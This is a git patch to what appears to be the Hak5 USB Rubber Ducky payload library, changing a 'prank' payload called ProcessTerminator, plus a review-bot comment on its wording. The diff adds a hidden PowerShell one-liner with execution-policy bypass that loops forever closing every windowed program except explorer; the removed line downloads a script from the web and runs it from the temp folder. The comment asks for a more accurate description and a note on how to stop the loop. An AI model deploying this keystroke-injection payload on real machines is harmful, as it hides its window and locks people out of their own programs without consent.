From f6ed30e2f33b7fb8b6b1e07645270d23396db37d Mon Sep 17 00:00:00 2001
From: dsymbol
Date: Fri, 9 Dec 2022 11:25:36 +0200
Subject: [PATCH] one liner
---
 payloads/library/prank/ProcessTerminator/payload.txt | 3 ++-
 payloads/library/prank/ProcessTerminator/pt.ps1 | 9 ---------
 2 files changed, 2 insertions(+), 10 deletions(-)
 delete mode 100644 payloads/library/prank/ProcessTerminator/pt.ps1
diff --git a/payloads/library/prank/ProcessTerminator/payload.txt b/payloads/library/prank/ProcessTerminator/payload.txt
index 1af9251..de2e691 100644
--- a/payloads/library/prank/ProcessTerminator/payload.txt
+++ b/payloads/library/prank/ProcessTerminator/payload.txt
@@ -3,7 +3,8 @@ REM Author: dsymbol
 REM Description: Hidden PowerShell script that tirelessly hunts down user processes and terminates them
 REM Target: Windows
+DELAY 2000
 GUI r
 DELAY 500
-STRING powershell -w h -NoP -Exec Bypass iwr https://raw.githubusercontent.com/hak5/usbrubberducky-payloads/master/payloads/library/prank/ProcessTerminator/pt.ps1 -OutFile $env:TEMP\pt.ps1; & "$env:TEMP\pt.ps1"
+STRING powershell -w h -NoP -NonI -Exec Bypass while(1) {$ws=gps|?{$_.MainWindowHandle-ne 0};foreach($w in $ws){if($w.ProcessName-ne'explorer'-and$w.Id-ne$PID){$w.CloseMainWindow()}}sleep -Seconds 1}
 ENTER
\ No newline at end of file
diff --git a/payloads/library/prank/ProcessTerminator/pt.ps1 b/payloads/library/prank/ProcessTerminator/pt.ps1
deleted file mode 100644
index 5c5419b..0000000
--- a/payloads/library/prank/ProcessTerminator/pt.ps1
+++ /dev/null
@@ -1,9 +0,0 @@
-while (1) {
- $ws = Get-Process | Where-Object { $_.MainWindowHandle -ne 0 }
- foreach ($w in $ws) {
- if ($w.ProcessName -ne 'explorer' -and $w.Id -ne $PID) {
- $w.CloseMainWindow()
- }
- }
- Start-Sleep -Seconds 1
-}
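Review bot: The `REM Description` context line in the payload.txt hunk still says the payload "terminates" processes, but the new `STRING` line only calls `CloseMainWindow()`, which asks each windowed process other than `explorer` and the script's own `$PID` to close and can be refused or held up by a save prompt. I would reword it to `REM Description: Hidden PowerShell loop that repeatedly asks every windowed process except explorer to close its main window`. The header also gives no way to stop the `while(1)` loop, so a line such as `REM Stop: end the hidden powershell.exe process or sign out of the session` would help whoever has to recover the machine. It is also worth stating in the header that the whole loop now lives in the `powershell.exe` command line rather than in a `pt.ps1` dropped under `$env:TEMP`, since that is where someone triaging the host will find it. The top of payload.txt lies outside the hunk.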